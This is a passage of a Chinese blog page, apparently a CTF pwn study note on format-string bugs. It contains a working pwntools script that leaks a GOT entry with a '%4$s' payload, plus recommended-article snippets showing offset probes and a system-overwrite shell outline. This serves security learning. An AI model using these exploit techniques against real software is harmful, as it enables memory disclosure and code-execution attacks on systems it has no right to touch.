pwn 学习笔记 格式化串计算偏移量

最新推荐文章于 2025-02-23 08:24:22 发布
最新推荐文章于 2025-02-23 08:24:22 发布
阅读量5.2k 收藏
点赞数 4
CC 4.0 BY-SA版权
分类专栏: pwn 训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_38783875/article/details/81706344

学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/

利用%s泄露libc函数的got表内容

addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。

利用  [tag]%p%p%p%p%p%p%p%p%p%p来确定k的值

(懒得打字)

利用下面这个脚本随便改改就可以泄露got表内容了,觉得自己好草率

from pwn import *
sh = process('./leakmemory')
leakmemory = ELF('./leakmemory')
__isoc99_scanf_got = leakmemory.got['__isoc99_scanf']
print hex(__isoc99_scanf_got)
payload = p32(__isoc99_scanf_got) + '%4$s'
print payload
gdb.attach(sh)
sh.sendline(payload)
sh.recvuntil('%4$s\n')
print hex(u32(sh.recv()[4:8])) # remove the first bytes of __isoc99_scanf@got
sh.interactive()

利用%n覆盖内存

最低0.47元/天 解锁文章

200万优质内容无限畅学
[第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量
Dem1的博客
04-09 915
正经wp from pwn import* p=remote("node4.buuoj.cn",29506) bssaddr = 0x804c044 #binaddr = 0x0804932F #1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x' ## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78
pwn 获取函数/字符串相对偏移
weixin_44932880的博客
11-10 646
readelf -s file 获取程序的函数,变量相对偏移 readelf -s /lib/x86_64-linux-gnu/libc.so.6 |grep "system@@GLIBC_2.2.5" 查看system函数相对库的偏移 readelf -S file 程序段表 -s 程序符号表 -S 段表 -h 文件头显示ELF文件头 -l 程序标题显示程序标题 -e 相当于:-h-l-S -t 段表细节 --dyn-syms 显示动态符号表 -n 显示内核注释 -r 显示
PWN:栈溢出----偏移的计算
m0_53932372的博客
08-03 2535
就目前遇到的栈溢出题目而言,使用ida就可以完成便宜的计算。 这些栈溢出题目,基本上不需要调试,ida本身提供的栈空间数据就可以实现偏移的计算。 BUUCTF:bjdctf_2020_babystack2 这道题目,我们看ida: 具体做法不细说,主要看偏移: buf和nbyte 看栈空间: 下方没有s只有r,而r就是返回地址 给了后门函数,那就利用read函数,达到缓冲区溢出的目的。 +0x8-(-0x10)=0x18=24 偏移就是二十四。 以上只是本人拙见,栈溢出偏移困扰了我很久,希望这次不会
格式化字符串漏洞利用时计算的偏移到底是什么?
weixin_48066554的博客
02-07 2832
格式化字符串漏洞利用时计算的偏移到底是什么? 我们平时在自己做题或者是看大佬们的wp时都会看见这种说法 说法一: 说法二: 相信有不少半路出家的小白都和我一样都只是知其然不知其所以然,那这里所说的“偏移”到底是什么意思呢? 我们结合这道题来详细讲一讲这些个偏移量所具体代表的意思 先来看伪代码 //main函数 void __fastcall __noreturn main(int a1, char **a2, char **a3) { int v3; // [rsp+24h] [rbp-Ch] BY
CTF PWN新手入门篇,PWN学习总结_pwn 计算偏移量和覆盖返回地址
HackKong的博客
02-07 847
一什么是栈溢出?栈溢出就是缓冲区溢出的一种。由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写入的地方,比如说返回地址。
pwn入门--格式化字符串
yjh_fnu_ltn的博客
07-11 1062
gdb中格式化字符串在栈上的位置的,就是偏移。
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
qq_66013948的博客
03-05 1673
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
【Web狗自虐系列2】Pwn入门之格式化字符串漏洞
就这样吧
07-24 1180
格式化字符串(Fromat String):在编码过程中,允许编码人员通过特殊的占位符,将相关对应的信息整合或提取的规则字符串格式化字符串包括格式化输入和格式化输出 以printf()为例,第一个参数就是格式化字符串:“字符串 %s, 整数 %d, 浮点数 %f”,然后printf函数会根据这个格式化字符串来解析对应的其他参数%d /// 十进制-输出十进制整数%s /// 字符串-从内存中读取字符串%lx /// 十六进制-输出十六进制数。
[pwn]格式化字符串全自动exp!!!
mid2dog
05-14 2976
前言 格式化字符串一把梭真的好爽!!!!!! 再也不用绞尽脑汁去gdb调试多少个字节和几位了!! 呜呜呜,花了一个通宵把这一系列搞定,喜极而泣,特此记录 以前的我做这类题心理状态: 现在的我: 总之就是非!常!爽! 这里我用的例题是 [第五空间2019决赛] 里的pwn5,考察到的知识是单纯的格式化字符串格式化字符串原理及利用 原理就不赘述啦,详情参考ctfwiki上的内容 或者搜索下,其他很多大佬写的文章都超级棒!! 利用的话,如下: 利用格式化字符串的漏洞,一般会有如下几种操作: 泄露栈内存
CTF PWN 格式化字符串
VisualNull的博客
06-05 1431
CTF PWN格式化字符串
偏移计算工具
11-06
偏移计算工具,第一个编辑框填写基质,其余全部填写对应偏移即可!
记一次赛题--pwn--没有溢出啦【格式化字符串
qq_73149934的博客
12-12 309
记一次赛题--pwn--没有溢出啦【格式化字符串
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 962
printf 在C语言中,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其中Fomat String是其第一个参数,我们一般称之为格式化字符串 printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行对应,将格式化字符串中的特定子,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器中获取参数并与符号说明相匹配,然
栈溢出计算偏移量
weixin_62675330的博客
03-08 5004
栈溢出计算偏移量 一,GDB调试出偏移量 0x8048677 <main+95> lea eax, [esp + 0x1c] 0x804867b <main+99> mov dword ptr [esp], eax ► 0x804867e <main+102> call gets@plt 通过这一汇编指令可以看出来,此时起始地址相对于esp的偏移为0x1c,只要查看这时候的esp和ebp的寄存器就可以知道偏移量为多少。
PWN学习总结
windy_ll的博客
12-26 2390
一、栈溢出原理     什么是栈溢出?栈溢出就是缓冲区溢出的一种。 由于缓冲区溢出而使得有用的存储单元被改写,往往会引发不可预料的后果。程序在运行过程中,为了临时存取数据的需要,一般都要分配一些内存空间,通常称这些空间为缓冲区。如果向缓冲区中写入超过其本身长度的数据,以致于缓冲区无法容纳,就会造成缓冲区以外的存储单元被改写,这种现象就称为缓冲区溢出。缓冲区长度一般与用户自己定义的缓冲变量的类型有关。(PS:摘自百度百科)     简单来说,就是程序没有检查用户输入的数据长度,导致攻击者覆盖栈上不是程序希望写
buuctf-pwn 5-8
m0_74355719的博客
10-04 189
查看栈结构发现v2的长度为0x3c,即60个字节,而输入被限制在32个字节内,每个I可以被替换成you,所以输入60÷3=20个I就能让栈溢出,然后db 4 dup(?发现明显的格式化漏洞,因为这个dword_804c044从服务器读入,无法知道其内容,所以使用%n将其数据修改,随后passwd输入相同的数据即可得到shell。思路:利用字符串漏洞将判断的atoi直接替换成system,然后手动输入"/bin/sh"字符串,即可达成system(“/bin/sh”)目的。
[PWN]——格式化字符串漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 4936
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
Pwn 课程第五节: 栈溢出漏洞利用
最新发布
weixin_44948224的博客
02-23 1968
栈溢出漏洞利用(Stack Buffer Overflow Exploitation)是 Pwn 领域最基础也是最常见的攻击方式之一。其核心思想是利用程序未正确检查用户输入的长度,导致缓冲区溢出,覆盖返回地址,最终劫持程序控制流。了解栈溢出漏洞的基本原理。通过和计算偏移量。通过覆盖返回地址实现代码执行。了解ret2libc技术,绕过 NX 保护。
pwntools中fmtstr的使用
fa1c4的blog
02-01 4997
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7475
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值